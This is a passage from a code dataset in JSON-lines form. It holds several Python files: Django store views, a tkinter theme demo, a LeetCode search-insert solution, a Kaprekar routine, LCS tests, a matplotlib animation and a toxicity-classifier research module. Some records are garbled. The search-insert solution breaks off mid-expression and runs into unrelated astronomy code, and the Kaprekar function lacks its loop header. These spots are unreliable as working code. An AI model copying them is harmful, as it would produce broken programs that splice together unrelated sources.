StoreForm(request.POST,submit_title='建立')\r\n if form.is_valid():\r\n store = form.save()\r\n return redirect(store.get_absolute_url())\r\n else:\r\n form = StoreForm(submit_title='建立')\r\n return render(request, 'stores/store_create.html', {'form': form})\r\n\t\r\ndef store_update(request, pk):\r\n try:\r\n store = Store.objects.get(pk=pk)\r\n except Store.DoesNotExist:\r\n raise Http404\r\n #StoreForm = modelform_factory(Store, fields=('name', 'notes',))\r\n if request.method == 'POST':\r\n form = StoreForm(request.POST, instance=store,submit_title='更新')\r\n if form.is_valid():\r\n store = form.save()\r\n return redirect(store.get_absolute_url())\r\n else:\r\n form = StoreForm(instance=store,submit_title='更新')\r\n return render(request, 'stores/store_update.html', {\r\n 'form': form, 'store': store,\r\n })","sub_path":"stores/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"21602604","text":"#!/usr/bin/env python3\n# vim: set fileencoding=utf-8\n\nimport tkinter\nfrom tkinter import ttk\n\nimport sys\n\n\ndef exit():\n sys.exit(0)\n\n\nroot = tkinter.Tk()\n\nstyle = ttk.Style()\n\nstyle.configure(\"Red.TButton\", background=\"#ff8080\")\n\nbutton1 = ttk.Button(root, text=\"clam\", command=lambda: style.theme_use(\"clam\"))\nbutton2 = ttk.Button(root, text=\"alt\", command=lambda: style.theme_use(\"alt\"))\nbutton3 = ttk.Button(root, text=\"default\", command=lambda: style.theme_use(\"default\"))\nbutton4 = ttk.Button(root, text=\"classic\", command=lambda: style.theme_use(\"classic\"))\n\nquitButton = ttk.Button(root, text=\"Exit\", style=\"Red.TButton\", command=exit)\n\nbutton1.grid(column=1, row=1, sticky=\"we\")\nbutton2.grid(column=2, row=1, sticky=\"we\")\nbutton3.grid(column=1, row=2, sticky=\"we\")\nbutton4.grid(column=2, row=2, sticky=\"we\")\n\nquitButton.grid(column=2, row=5, sticky=\"we\")\n\nlabel = tkinter.Label(root, text=\"Hello world\")\nentry = tkinter.Entry(root)\ncheckbutton = tkinter.Checkbutton(text=\"Do you like Tkinter?\")\n\ncheckbutton.grid(column=1, row=3, columnspan=2, sticky=\"w\")\nlabel.grid(column=1, row=4)\nentry.grid(column=2, row=4)\n\nroot.mainloop()\n","sub_path":"Python2/examples/tkinter/18_theme_selection.py","file_name":"18_theme_selection.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622625088","text":"\"\"\"\n35. Search Insert Position\nGiven a sorted array of distinct integers and a target value, \nreturn the index if the target is found. \nIf not, return the index where it would be if it were inserted in order.\n\nExample 1:\nInput: nums = [1,3,5,6], target = 5\nOutput: 2\nExample 2:\nInput: nums = [1,3,5,6], target = 2\nOutput: 1\nExample 3:\nInput: nums = [1,3,5,6], target = 7\nOutput: 4\nExample 4:\nInput: nums = [1,3,5,6], target = 0\nOutput: 0\nExample 5:\nInput: nums = [1], target = 0\nOutput: 0\n \n\nConstraints:\n1 <= nums.length <= 104\n-104 <= nums[i] <= 104\nnums contains distinct values sorted in ascending order.\n-104 <= target <= 104\n\"\"\"\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n if nums[0] > target : return 0\n L = len(nums)\n if nums[-1] < target : return L\n \n res=0\n # bisection search but only one iteration\n left , right = 0, L-1\n mid = (left+right)//2\n if nums[mid] < target :\n res , L = mid , L\n elif nums[mid] > target :\n res , L = 0, mid\n while target > nums[res] and res2.5],crs['ra'][crs['Q']>2.5],crs['dec'][crs['Q']>2.5]\n zoom_ras,zoom_decs=all_ras[np.abs(all_zs-spec_dict[strname]['z'])=10:\n L.append(x%10)\n x = x//10\n L.append(x)\n L.reverse()\n return L\n\ndef list2int(L):\n \"\"\"Donne l'entier décrit en base 10 par la liste de chiffres L\"\"\"\n n = 0\n for c in L:\n n = c + 10*n\n return n\n\ndef K(n):\n \"\"\"Kaprekar de n\"\"\"\n c = int2list(n)\n d = int2list(n)\n c.sort()\n d.sort(reverse = True)\n return list2int(d)-list2int(c)\n\ndef Kaprekar(n):\n x = n\n L = []\n while not (x in L):\n L.append(x)\n x = K(x)\n return L\n","sub_path":"Exercices/03_tableaux/TAB-011/Kaprekar.py","file_name":"Kaprekar.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"383105967","text":"import unittest\n\nfrom parameterized import parameterized\n\nfrom dynamic.tasks.longest_common_subsequence import LongestCommonSubSequence\n\n\nclass TestLongestCommonSubsequence(unittest.TestCase):\n\n def setUp(self):\n self.lcs = LongestCommonSubSequence()\n\n @parameterized.expand([\n ['1', 'abcbdab', 'bdcaba', 'bdab']\n ])\n def test_find_longest_subsequence_rec(self, n, s1, s2, r):\n self.assertEqual(self.lcs.lcs_recursive(s1, s2), r)\n\n @parameterized.expand([\n ['1', 'abcbdab', 'bdcaba', 'bcba'],\n ['2', 'abACCGGTCGAGTGCGCGGAAGCCGGCCGAA', 'GTCGTTCGGAATGCCGTTGCTCTGTAAA', 'GTCGTCGGAAGCCGGCCGAA'],\n ['3', '10010101', '010110110', '100110'],\n ['4', '', '', ''],\n ])\n def test_find_longest_subsequence(self, n, s1, s2, r):\n self.assertEqual(self.lcs.lcs(s1, s2), r)\n\n @parameterized.expand([\n ['1', 'abcbdab', 'bdcaba', 'bcba'],\n ['2', 'abACCGGTCGAGTGCGCGGAAGCCGGCCGAA', 'GTCGTTCGGAATGCCGTTGCTCTGTAAA', 'GTCGTCGGAAGCCGGCCGAA'],\n ['3', '10010101', '010110110', '100110'],\n ['4', '', '', ''],\n ['5', '', 'a', ''],\n ['6', 'a', '', '']\n ])\n def test_find_longest_subsequence_dict(self, n, s1, s2, r):\n self.assertEqual(self.lcs.lcs_dict(s1, s2), r)\n\n\n @parameterized.expand([\n ['1', 'abca', ['abc']],\n ['1', 'ba', ['a','b']],\n ['2', '', ['']],\n ['3', 'cbdbf', ['bdf','cdf']],\n ['4', 'wladbce', ['abce']],\n ])\n def test_increasing_lcs(self,n,s,r):\n self.assertEqual(r, self.lcs.lis(s))\n","sub_path":"crackinginterview-source/algo/tests/dynamic/test_longest_common_subsequence.py","file_name":"test_longest_common_subsequence.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"225674008","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport numpy as np\nimport scipy\n\n\nfig = plt.figure()\nax = fig.add_subplot(aspect='equal')\n\ncirc = plt.Circle((0, 0), radius=1, edgecolor='black', facecolor='None')\nax.add_patch(circ)\nplt.show()\n\nx = np.arange(0, 2*np.pi, 0.01)\nline, = ax.plot(x, np.sin(x))\n\n\ndef init(): # only required for blitting to give a clean slate.\n line.set_ydata([np.nan] * len(x))\n return line,\n\n\ndef animate(i):\n line.set_ydata(np.sin(x + i / 10)) # update the data.\n return line,\n\n\nani = animation.FuncAnimation(\n fig, animate, init_func=init, interval=2, blit=True, save_count=50)\n\n# To save the animation, use e.g.\n#\n# ani.save(\"movie.mp4\")\n#\n# or\n#\n# from matplotlib.animation import FFMpegWriter\n# writer = FFMpegWriter(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n# ani.save(\"movie.mp4\", writer=writer)\n\nplt.show()","sub_path":"00Junk00/OldStuff/AudioLocalizationTest/PlotAngle.py","file_name":"PlotAngle.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"64928398","text":"from collections import Counter\r\nfrom collections import defaultdict\r\nfrom copy import copy, deepcopy\r\nfrom gensim.models.keyedvectors import KeyedVectors\r\nfrom multiprocessing import Pool\r\nfrom nltk.classify.scikitlearn import SklearnClassifier\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom nltk.tokenize import word_tokenize\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.inspection import permutation_importance\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import classification_report, fbeta_score, roc_auc_score, roc_curve\r\nfrom sklearn.metrics import f1_score, plot_roc_curve, precision_recall_curve, auc\r\nfrom sklearn.metrics import PrecisionRecallDisplay, average_precision_score\r\nfrom sklearn.model_selection import StratifiedKFold, GridSearchCV, train_test_split, cross_val_score\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.feature_selection import SelectFromModel, SelectKBest, f_classif\r\nfrom sklearn.svm import SVC\r\nfrom src import classifiers\r\nfrom src import convo_politeness\r\nfrom src import create_features\r\nfrom src import text_modifier\r\nfrom src import text_parser\r\nfrom wordfreq import word_frequency\r\nimport itertools\r\nimport logging\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport operator\r\nimport pandas as pd\r\nimport pathlib\r\nimport pickle\r\nimport random\r\nimport re\r\nimport textblob\r\nimport time\r\nimport warnings\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom src.SentiCR import SentiCR\r\n\r\nimport time\r\nnow = str(int(time.time())) \r\n\r\noracle_data = pd.read_csv(\"src/SentiCR/oracle.csv\")\r\nSentiCR_model = SentiCR.SentiCR(algo=\"GBT\",training_data= oracle_data)\r\n\r\nimport sys\r\nsys.path.insert(0, \"politeness3\")\r\n\r\n# stop words: https://www.geeksforgeeks.org/removing-stop-words-nltk-python/\r\nstop_words = [\"ourselves\", \"hers\", \"between\", \"yourself\", \"but\", \"again\", \"there\", \"about\",\r\n\"once\", \"during\", \"out\", \"very\", \"having\", \"with\", \"they\", \"own\", \"an\", \"be\",\r\n\"some\", \"for\", \"do\", \"its\", \"yours\", \"such\", \"into\", \"of\", \"most\", \"itself\",\r\n\"other\", \"off\", \"is\", \"s\", \"am\", \"or\", \"who\", \"as\", \"from\", \"him\", \"each\",\r\n\"the\", \"themselves\", \"until\", \"below\", \"are\", \"we\", \"these\", \"your\", \"his\",\r\n\"through\", \"don\", \"nor\", \"me\", \"were\", \"her\", \"more\", \"himself\", \"this\", \"down\",\r\n\"should\", \"our\", \"their\", \"while\", \"above\", \"both\", \"up\", \"to\", \"ours\", \"had\",\r\n\"she\", \"all\", \"no\", \"when\", \"at\", \"any\", \"before\", \"them\", \"same\", \"and\",\r\n\"been\", \"have\", \"in\", \"will\", \"on\", \"does\", \"yourselves\", \"then\", \"that\",\r\n\"because\", \"what\", \"over\", \"why\", \"so\", \"can\", \"did\", \"not\", \"now\", \"under\",\r\n\"he\", \"you\", \"herself\", \"has\", \"just\", \"where\", \"too\", \"only\", \"myself\",\r\n\"which\", \"those\", \"i\", \"after\", \"few\", \"whom\", \"t\", \"being\", \"if\", \"theirs\",\r\n\"my\", \"against\", \"a\", \"by\", \"doing\", \"it\", \"how\", \"further\", \"was\", \"here\",\r\n\"than\"]\r\n\r\n# flip due to the removal of SE words\r\nFLIP = 1\r\nDONT_FLIP = 0\r\nTEXT_BASED = 0\r\nLOGS_BASED = 1\r\nCOMBINED = 2\r\n\r\nNUM_TRIALS = 10\r\nN_SPLITS = 10\r\nTEST_SIZE = 0.33\r\nfeature_names = [\"Text-based\", \"Logs-based\", \"Combined\"]\r\n\r\n\r\ndef isascii(s):\r\n return all(ord(c) < 128 for c in s)\r\n\r\n\r\nnum_subproc = 20\r\nmodel = 0\r\n\r\nse_file = open(\"src/data/SE_words_G.list\")\r\nSE_words = [se_word.strip() for se_word in se_file.readlines()]\r\n\r\ndef score(lexicon_dataframe, text):\r\n \"\"\"Need to do stemming later\"\"\"\r\n\r\n all_specific = lexicon_dataframe[\"specific\"].unique()\r\n\r\n text = word_tokenize(text)\r\n text = [i.lower() for i in text]\r\n\r\n score_dict = {}\r\n for category in all_specific:\r\n score_dict[category] = 0\r\n category_words = set(lexicon_dataframe[lexicon_dataframe[\"specific\"] ==\\\r\n category][\"word\"].tolist())\r\n score_dict[category] = len(category_words.intersection(text))\r\n\r\n return score_dict\r\n\r\n\r\ndef rescore(row, features, tf_idf_counter):\r\n new_sentence = row[\"text\"]\r\n new_features_dict = {}\r\n for f in features:\r\n new_features_dict[f] = row[f]\r\n\r\n if \"perspective_score\" in features:\r\n persp_score = create_features.get_perspective_score(new_sentence, \"en\")\r\n new_features_dict[\"perspective_score\"] = persp_score[0]\r\n new_features_dict[\"identity_attack\"] = persp_score[1]\r\n\r\n if \"sentiment\" in features:\r\n new_features_dict[\"sentiment\"] = SentiCR_model.get_sentiment_polarity(new_sentence)[0]\r\n\r\n if \"word2vec_0\" in features:\r\n # Calcualte word2vec\r\n df = pd.DataFrame([{\"text\": new_sentence}])\r\n df = text_modifier.add_word2vec(df).iloc[0]\r\n word2vec_values = [df[\"word2vec_{}\".format(i)] for i in range(300)]\r\n\r\n for i in range(300):\r\n new_features_dict[\"word2vec_{}\".format(i)] = word2vec_values[i]\r\n\r\n if \"LIWC_anger\" in features:\r\n lexicon_df = pd.read_csv(\"src/data/lexicons.txt\")\r\n s = score(lexicon_df, new_sentence)\r\n new_features_dict[\"LIWC_anger\"] = s[\"LIWC_anger\"]\r\n\r\n if \"negative_lexicon\" in features:\r\n lexicon_df = pd.read_csv(\"src/data/lexicons.txt\")\r\n s = score(lexicon_df, new_sentence)\r\n new_features_dict[\"negative_lexicon\"] = s[\"negative_lexicon\"]\r\n\r\n if \"nltk_score\" in features:\r\n sid = SentimentIntensityAnalyzer()\r\n nltk_score = sid.polarity_scores(new_sentence)[\"compound\"]\r\n new_features_dict[\"nltk_score\"] = nltk_score\r\n\r\n if \"polarity\" in features or \"subjectivity\" in features:\r\n textblob_scores = textblob.TextBlob(new_sentence)\r\n new_features_dict[\"polarity\"] = textblob_scores.polarity\r\n new_features_dict[\"subjectivity\"] = textblob_scores.subjectivity\r\n\r\n if \"tf_idf_0\" in features:\r\n df = pd.DataFrame([{\"text\": new_sentence}])\r\n df = add_counts(tf_idf_counter, df, name=\"tf_idf_\").iloc[0]\r\n\r\n for f in features:\r\n if \"tf_idf_\" in f:\r\n new_features_dict[f] = df[f]\r\n\r\n return new_features_dict\r\n\r\n# postprocessing (usually only done for toxic comments)\r\n# returns list of clean text variants\r\n# Sophie: Jun 17: not used?\r\ndef clean_text(text):\r\n result = []\r\n words = text.split(\" \")\r\n words = [a.strip(\",.!?:; \") for a in words]\r\n\r\n words = list(set(words))\r\n words = [\r\n word for word in words if not isascii(word) or word.lower() in SE_words\r\n ]\r\n\r\n for word in set(words):\r\n # Maybe unkify?\r\n result += [\r\n re.sub(r\"[^a-zA-Z0-9]\" + re.escape(word.lower()) + r\"[^a-zA-Z0-9]\",\r\n \" potato \", \" \" + text.lower() + \" \").strip()\r\n ]\r\n\r\n tokenizer = RegexpTokenizer(r\"\\w+\")\r\n all_words = tokenizer.tokenize(text)\r\n\r\n result += [text]\r\n return result\r\n\r\n\r\n# input: comment, trained model, features used, ?\r\n# output: 0 if the comment was labeled to be toxic NOT due to SE words (it IS toxic)\r\n# 1 if the comment was labeled to be toxic due to SE words (it shouldn't\r\n# be toxic)\r\ndef remove_SE_comment(features_df, Google, row, model, features, max_values, tf_idf_counter):\r\n text = row[\"text\"]\r\n t = time.time()\r\n words = text.split(\" \")\r\n words = [a.strip(\",.!?:; \") for a in words]\r\n\r\n words = list(set(words))\r\n # SE_words: words with a different distribution in SE context than in\r\n # normal EN context\r\n words = [\r\n word for word in words if not word.isalpha() or word.lower() in SE_words\r\n ]\r\n\r\n # the comment was labeld to be toxic not because it contains SE words\r\n if len(words) == 0:\r\n return 0\r\n\r\n smallest_new_pred = 1\r\n for word in set(words):\r\n # if word is a stop word\r\n if word in stop_words or (not word.isalpha()):\r\n continue\r\n\r\n new_sentence = re.sub(\r\n r\"[^a-zA-Z0-9]\" + re.escape(word.lower()) + r\"[^a-zA-Z0-9]\", \" potato \",\r\n text.lower())\r\n # re-compute features\r\n row[\"text\"] = new_sentence\r\n new_features_dict = rescore(row, features, tf_idf_counter)\r\n\r\n new_features = {}\r\n for f in features:\r\n max_f = max_values[f]\r\n \r\n if max_f != 0:\r\n new_features[f] = new_features_dict[f]/max_f\r\n else:\r\n new_features[f] = new_features_dict[f]\r\n\r\n # after removing SE words, the model labels it as non-toxic\r\n new_features = pd.DataFrame([new_features])\r\n new_pred = model.predict_proba(new_features)[0][1]\r\n if new_pred < smallest_new_pred:\r\n smallest_new_pred = new_pred\r\n\r\n # go back to the prev level to see if it's below the threshold\r\n return smallest_new_pred\r\n\r\nclass Suite:\r\n\r\n def __init__(self):\r\n global counter\r\n\r\n self.features = []\r\n self.feature_type = \"\"\r\n self.max_feature_values = {}\r\n self.nice_features = []\r\n self.parameter_names = []\r\n self.hyper_parameters_lists = []\r\n self.param_grid = {}\r\n self.last_time = time.time()\r\n self.tf_idf_counter = 0\r\n self.use_filters = True\r\n\r\n self.anger_classifier = pickle.load(open(\"src/pickles/anger.p\", \"rb\"))\r\n self.all_words = pickle.load(open(\"src/pickles/all_words.p\", \"rb\"))\r\n self.all_false = {word: False for word in self.all_words}\r\n\r\n start_time = time.time()\r\n self.alpha = 0.1\r\n\r\n self.all_train_data = None\r\n self.test_data = None\r\n self.train_data = None\r\n self.model_function = None\r\n self.model = None\r\n self.Google = False\r\n\r\n def set_G(self, G):\r\n self.Google = G\r\n\r\n def set_model_function(self, model_function):\r\n self.model_function = model_function\r\n\r\n def set_trained_model(self, trained_model):\r\n self.model = trained_model\r\n\r\n def add_parameter(self, name, l):\r\n self.parameter_names.append(name)\r\n self.hyper_parameters_lists.append(l)\r\n\r\n def set_ratios(self, ratios):\r\n self.ratio = ratios\r\n\r\n def set_train_set(self, train_collection):\r\n self.train_collection = train_collection\r\n self.all_train_data = create_features.create_features(\r\n train_collection, \"training\", self.Google)\r\n\r\n # we need to normalize features for SVM\r\n for f in self.all_train_data.columns:\r\n if f in [\"text\", \"author\", \"author_association\", \"url\", \"html_url\"]: \r\n continue\r\n try:\r\n self.max_feature_values[f] = max(self.all_train_data[f].tolist())\r\n except:\r\n pass\r\n logging.info(\r\n \"Prepared training dataset, it took {} seconds\".format(time.time() - \\\r\n self.last_time))\r\n self.last_time = time.time()\r\n\r\n def set_unlabeled_set(self, test_collection):\r\n self.test_collection = test_collection\r\n self.test_data = create_features.create_features(test_collection,\r\n \"unlabeled\", self.Google)\r\n # normalize feature\r\n for f in self.test_data.columns:\r\n if f in [\"text\", \"author\", \"author_association\", \"url\", \"html_url\"]: \r\n continue\r\n try:\r\n self.max_feature_values[f] = max(self.test_data[f].tolist())\r\n except:\r\n pass\r\n logging.info(\r\n \"Prepared unlabeled dataset, it took {} seconds\".format(time.time() - \\\r\n self.last_time))\r\n\r\n self.last_time = time.time()\r\n\r\n def convert(self, test_sentence):\r\n ret = copy(self.all_false)\r\n\r\n for word in word_tokenize(str(test_sentence).lower()):\r\n ret[word] = True\r\n\r\n return ret\r\n\r\n def remove_I(self, test_issues):\r\n test_issues[\"self_angry\"] = 0\r\n\r\n test_issues.loc[test_issues.prediction == 1, \"self_angry\"] = test_issues[\r\n test_issues[\"prediction\"] == 1][\"original_text\"].map(\r\n lambda x: self.anger_classifier.classify(self.convert(x)))\r\n\r\n test_issues.loc[test_issues.self_angry == \"self\", \"prediction\"] = 0\r\n\r\n return test_issues\r\n\r\n def remove_SE(self, data, model, thres):\r\n logging.info(\"Removing SE words\")\r\n features = self.features\r\n tf_idf_counter = self.tf_idf_counter\r\n model = model\r\n\r\n p = Pool(num_subproc)\r\n data[\"is_SE\"] = 0\r\n new_pred = p.starmap(remove_SE_comment, [\r\n (data, self.Google, x, model, features, self.max_feature_values, tf_idf_counter)\r\n for x in data.loc[data[\"raw_prediction\"] >= thres].T.to_dict().values()\r\n ])\r\n data.loc[data.raw_prediction >= thres, \"is_SE\"] = new_pred\r\n data.loc[data.raw_prediction >= thres, \"prediction\"] = new_pred\r\n\r\n return data\r\n\r\n def classify_test(self):\r\n return classifiers.classify(self.model, self.train_data, self.test_data,\r\n self.features)\r\n\r\n def classify_test_statistics(self):\r\n return classify_statistics(self.model, self.train_data, self.test_data,\r\n self.features)\r\n\r\n def set_parameters(self, grid):\r\n self.param_grid = grid\r\n\r\n def print_accuracy(self, y, score, raw_score):\r\n logging.info(\"\\n{}\".format(\r\n classification_report(y, score)))\r\n logging.info(\"ROC AUC: {}\".format(roc_auc_score(y, raw_score)))\r\n fpr, tpr, thresholds = roc_curve(y, raw_score)\r\n logging.info(\"To plot ROC curve: fpr: {}\".format(\r\n \",\".join([str(x) for x in fpr])))\r\n logging.info(\"To plot ROC curve: tpr: {}\".format(\r\n \",\".join([str(x) for x in tpr])))\r\n logging.info(\"Thresholds: {}\".format(thresholds))\r\n\r\n\r\n # training the model on comments\r\n def self_issue_classification_all(self, model_name, fid, fig,\r\n fig_roc, ax_roc, ax_c_roc,\r\n fig_pr, ax_pr, fig_c_pr, ax_c_pr):\r\n # n-fold nested cross validation\r\n # https://scikit-learn.org/stable/auto_examples/model_selection/plot_nested_cross_validation_iris.html\r\n best_model = None\r\n best_parameters = {\"n_estimators\": 10, \"max_features\": \"sqrt\", \"max_depth\": 10}\r\n best_score = 0\r\n if model_name == \"svm\":\r\n estimator = svc()\r\n elif model_name == \"rf\":\r\n estimator = RandomForestClassifier()\r\n elif model_name == \"lg\":\r\n estimator = LogisticRegression()\r\n out_f = open(feature_names[fid]+\"_curves.log\", \"w\")\r\n\r\n # split training and test: GET X_train, X_test, y_train, y_test\r\n if fid == LOGS_BASED:\r\n # split training and test\r\n # split thread_labels\r\n # shouldn't specify column names here because G has 1 extra than OSS\r\n tmp_data = self.all_train_data[self.features+[\"thread_id\", \"thread_label\"]]\r\n\r\n # keep only one data point from each conversation thread\r\n thread_id_label = tmp_data.drop_duplicates()\r\n X_train, test_data, y_train, y_test = train_test_split(\r\n thread_id_label, \r\n thread_id_label[\"thread_label\"], \r\n test_size=TEST_SIZE,\r\n random_state=42)\r\n test_data[\"label\"] = test_data[\"thread_label\"]\r\n\r\n # split data into train and test\r\n X_train = X_train[self.features]\r\n X_test = test_data[self.features]\r\n else:\r\n # split thread_labels\r\n thread_id_label = self.all_train_data[[\"thread_id\", \"thread_label\"]]\r\n thread_id_label = thread_id_label.drop_duplicates()\r\n X_train_id, X_test_id, _, _ = train_test_split(\r\n thread_id_label, \r\n thread_id_label[\"thread_label\"], \r\n test_size=TEST_SIZE,\r\n random_state=42)\r\n\r\n # split data into train and test\r\n X_train_id = X_train_id[\"thread_id\"]\r\n X_test_id = X_test_id[\"thread_id\"]\r\n train_data = self.all_train_data.loc[self.all_train_data[\"thread_id\"].isin(X_train_id)]\r\n test_data = self.all_train_data.loc[self.all_train_data[\"thread_id\"].isin(X_test_id)]\r\n\r\n X_train = train_data[self.features]\r\n y_train = train_data[\"label\"]\r\n X_test = test_data[self.features]\r\n y_test = test_data[\"label\"]\r\n\r\n\r\n # thread-level labels\r\n label_data = test_data[[\"thread_id\", \"thread_label\"]]\r\n true_thread_label = label_data.groupby(\"thread_id\").first()\r\n true_thread_label = true_thread_label.reset_index()\r\n true_thread_label = true_thread_label[\"thread_label\"]\r\n\r\n # for plottinig\r\n if fid == 0:\r\n color = \"g\"\r\n elif fid == 1:\r\n color = \"b\"\r\n else:\r\n color = \"r\"\r\n\r\n # some scores for t-tests\r\n train_scores = []\r\n test_comment_scores = []\r\n test_thread_scores = []\r\n auc_comment_scores = []\r\n auc_thread_scores = []\r\n pr_auc_thread_scores = []\r\n pr_auc_comment_scores = []\r\n\r\n all_tprs = []\r\n all_fprs = []\r\n all_ps = []\r\n all_rs = []\r\n\r\n # do training NUM_TRIALS times\r\n for i in range(NUM_TRIALS):\r\n # find the best paramter combination\r\n model = GridSearchCV(\r\n estimator=estimator,\r\n param_grid=self.param_grid,\r\n scoring=\"f1\",\r\n n_jobs=num_subproc, # parallel\r\n cv=StratifiedKFold(n_splits=N_SPLITS, shuffle=True),\r\n verbose=0)\r\n model.fit(X_train, y_train)\r\n\r\n # nested cross validation with paramter optimization\r\n nested_score = cross_val_score(\r\n model,\r\n X_train,\r\n y_train,\r\n scoring=\"f1\",\r\n cv=StratifiedKFold(n_splits=N_SPLITS, shuffle=True))\r\n nested_scores = nested_score.mean()\r\n if nested_scores > best_score:\r\n best_score = nested_scores\r\n # find the hyperparameters associated with the higest f1 training score\r\n best_parameters = dict(model.best_params_)\r\n train_scores.append(nested_scores)\r\n\r\n # The optimal parameters\r\n logging.info(\"Tried all combinations of hyper parameters.\")\r\n logging.info(\"Scores with {}x{} nested cross validation\".format(\r\n NUM_TRIALS,\r\n N_SPLITS))\r\n logging.info(\"Best parameter: {}.\".format(best_parameters))\r\n logging.info(\"Best score: {}.\".format(best_score))\r\n\r\n # test how the current model works\r\n # test for bootstraping\r\n pred_prob = model.predict_proba(test_data[self.features])\r\n test_data[\"raw_prediction\"] = [pp[1] for pp in pred_prob]\r\n test_data[\"prediction\"] = test_data[\"raw_prediction\"]\r\n\r\n if fid == LOGS_BASED:\r\n test_data[\"label\"] = test_data[\"thread_label\"]\r\n\r\n # record before SE adjustment\r\n # for Logs-based, it should be the same..b/c no SE adjust\r\n [_, _, _, _, _, best_thres, _, _] = self.get_all_curves(\r\n test_data[\"label\"], \r\n test_data[\"raw_prediction\"],\r\n fid,\r\n \"before SE adjustment\",\r\n out_f)\r\n # get F1 score on thread-level\r\n if fid != LOGS_BASED:\r\n # remove SE words\r\n #logging.info(\"Removing SE words.\")\r\n # tentatively assign each data point to a class based on the best\r\n # threshold using raw predictions\r\n #assign_class = lambda x:int(x>=best_thres)\r\n #test_data[\"prediction\"] = test_data[\"prediction\"].map(assign_class)\r\n\r\n precision, recall, thresholds = precision_recall_curve(\r\n test_data[\"label\"],\r\n test_data[\"raw_prediction\"])\r\n\r\n\r\n tprs = []\r\n fprs = []\r\n f1s = []\r\n precisions = []\r\n recalls = []\r\n\r\n thresholds = np.linspace(thresholds[0], thresholds[-1], 50)\r\n #test_data = self.remove_SE(test_data, model, 0.5)\r\n best_pr_auc = 0\r\n for threshold in thresholds:\r\n # for each comment threshold, aggregate thread prediction, get TPR, FPR\r\n label_data = test_data[[\"thread_id\", \"prediction\"]]\r\n label_data[\"prediction\"] = label_data[\"prediction\"].map(lambda x:x>threshold)\r\n predicted_threads = label_data.groupby(\"thread_id\")[\"prediction\"].sum()\r\n predicted_threads = predicted_threads.reset_index()\r\n predicted_threads[\"thread_prediction\"] = \\\r\n predicted_threads[\"prediction\"].map(lambda x: int(x>0))\r\n predicted_thread_label = predicted_threads[\"thread_prediction\"]\r\n\r\n f1s.append(f1_score(true_thread_label.tolist(),\r\n predicted_thread_label.tolist()))\r\n\r\n tp = sum([(p==True and t==True) for (p, t) in zip(predicted_thread_label,\r\n true_thread_label)])\r\n fn = sum([(p==False and t==True) for (p, t) in zip(predicted_thread_label, \r\n true_thread_label)])\r\n fp = sum([(p==True and t==False) for (p, t) in zip(predicted_thread_label, \r\n true_thread_label)])\r\n tn = sum([(p==False and t==False) for (p, t) in zip(predicted_thread_label, \r\n true_thread_label)])\r\n tprs.append(tp/(tp+fn))\r\n fprs.append(fp/(tn+fp))\r\n cur_recall = tp/(tp+fn)\r\n recalls.append(tp/(tp+fn))\r\n if tp+fp == 0:\r\n precisions.append(0)\r\n else:\r\n precisions.append(tp/(tp+fp))\r\n\r\n best_thres = thresholds[np.argmax(f1s)]\r\n if i == 0: # first trial\r\n ax_roc.plot(fprs, tprs, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n ax_pr.plot(recalls, precisions, color=color, linewidth=0.5,\r\n label=feature_names[fid]+\" thread-level\")\r\n else:\r\n ax_roc.plot(fprs, tprs, color=color, linewidth=0.5)\r\n ax_pr.plot(recalls, precisions, color=color, linewidth=0.5)\r\n cur_pr_auc = auc(recalls, precisions)\r\n cur_pr_auc = auc(recalls, precisions)\r\n if cur_pr_auc > best_pr_auc:\r\n best_pr_auc = cur_pr_auc\r\n\r\n out_f.write(\"thread level precisions:{}\".format(str(precisions)))\r\n out_f.write(\"thread level recalls:{}\".format(str(recalls)))\r\n logging.info(\"thread level AUC PR:{}\".format(best_pr_auc))\r\n pr_auc_thread_scores.append(best_pr_auc)\r\n\r\n out_f.write(\"thread level tprs:{}\".format(str(tprs)))\r\n out_f.write(\"thread level fprs:{}\".format(str(fprs)))\r\n out_f.write(\"f1s: {}\".format(str(f1s)))\r\n test_thread_scores.append(max(f1s))\r\n auc_thread_scores.append(auc(fprs, tprs))\r\n out_f.write(\"thread level ROC AUC: {}\".format(\r\n \t\t\t\tauc(fprs, tprs)))\r\n\r\n all_fprs.append(list(fprs))\r\n all_tprs.append(list(tprs))\r\n all_ps.append(list(precisions))\r\n all_rs.append(list(recalls))\r\n \r\n\r\n\r\n # COMMENTS, use the threshold that yields the best thread-level\r\n # performance\r\n # currently, predictions are all probabilities\r\n # for non-changed data, it was assigned to be the same as prev raw_pred\r\n # for changed ones, it is the new proba given new features\r\n # convert to binary class\r\n #test_data = self.remove_SE(test_data, model, best_thres)\r\n\r\n logging.info(\"Crossvalidation score for comments after adjustment\")\r\n logging.info(\"{}\".format(classification_report(\r\n test_data[\"label\"],\r\n test_data[\"prediction\"].map(lambda x:x>=best_thres))))\r\n\r\n logging.info(\"Number of 1's in raw prediction: {}.\".format(\r\n sum([tt > 0 for tt in test_data[\"raw_prediction\"]])))\r\n try:\r\n logging.info(\"Number of data flipped due to SE: 